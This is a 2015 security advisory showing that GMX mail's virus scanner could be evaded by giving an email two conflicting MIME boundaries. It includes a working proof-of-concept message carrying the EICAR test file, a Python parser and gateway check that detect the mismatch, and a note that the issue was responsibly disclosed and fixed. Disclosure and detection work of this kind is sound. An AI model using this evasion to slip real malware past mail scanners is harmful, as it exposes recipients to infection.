July 2015

Please note that republishing this article in full or in part is only allowed under the conditions described here.

Bypassing GMX Virus Scanning using Conflicting MIME Boundaries

The virus scanner integrated in GMX mail can be bypassed by using conflicting MIME boundaries. This kind of evasion is described in detail in Dubious MIME - Conflicting Multipart Boundaries.

Proof Of Concept

     From: foo
     To: bar
     Subject: eicar - conflicting boundaries
     Mime-Version: 1.0
     Content-type: multipart/mixed; boundary=foo
     Content-type: multipart/mixed; boundary=bar
     
     --foo
     Content-type: text/plain
     
     --bar
     Content-type: application/octet-stream; name=eicar.com
     Content-Transfer-Encoding: base64
     
     WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNU
     QU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo=
     --bar--
     --foo--

GMX Webmail will use the second boundary 'bar' for displaying the mail and for downloads of attachments. This way it provides access to the attached file 'eicar.com' which contains the Eicar test virus.

The virus scanner, however, will use the first boundary 'foo' and thus will not see the attached virus.
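The disagreement between the two parsers can be reproduced and checked for at a mail gateway. The following is an added example, not code from the advisory: it parses a constructed message modelled on the PoC once with each declared boundary and shows that only the 'bar' view exposes an attachment, while a simple gateway check flags the duplicate boundaries before either consumer sees the mail. The base64 body is a harmless placeholder, not the EICAR string.

```python
import re

# Constructed message modelled on the advisory's PoC. The base64 body is a
# harmless placeholder ("PLACEHOLDER"), not the EICAR string from the page.
RAW_MAIL = """Content-type: multipart/mixed; boundary=foo
Content-type: multipart/mixed; boundary=bar

--foo
Content-type: text/plain

--bar
Content-type: application/octet-stream; name=eicar.com
Content-Transfer-Encoding: base64

UExBQ0VIT0xERVI=
--bar--
--foo--
"""

def declared_boundaries(raw):
    """Every boundary declared in the header block, in header order."""
    headers = raw.split("\n\n", 1)[0]
    return re.findall(r'(?im)^content-type:.*?boundary="?([^";\s]+)', headers)

def split_parts(raw, boundary):
    """Split the body on one chosen boundary, as a parser committed to it would."""
    parts, current, inside = [], [], False
    for line in raw.split("\n\n", 1)[1].split("\n"):
        if line == "--" + boundary or line == "--" + boundary + "--":
            if inside:                      # a delimiter closes the current part
                parts.append("\n".join(current))
            if line.endswith("--"):        # closing delimiter: stop here
                break
            current, inside = [], True
        elif inside:
            current.append(line)
    return parts

def attachment_names(raw, boundary):
    """File names a consumer sees when it splits the body with `boundary`."""
    names = []
    for part in split_parts(raw, boundary):
        m = re.search(r'name="?([^";\s]+)', part.split("\n\n", 1)[0], re.I)
        if m:
            names.append(m.group(1))
    return names

def has_conflicting_boundaries(raw):
    """Gateway check: distinct boundaries mean scanner and client may disagree."""
    return len(set(declared_boundaries(raw))) > 1
```

Parsing with 'foo' yields a single text/plain part and no attachment, which is the scanner's view; parsing with 'bar' yields the 'eicar.com' attachment, which is the webmail view.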

Responsible Disclosure

The issue was reported to GMX in 06/2015 (ticket C542162419) and fixed within a few weeks.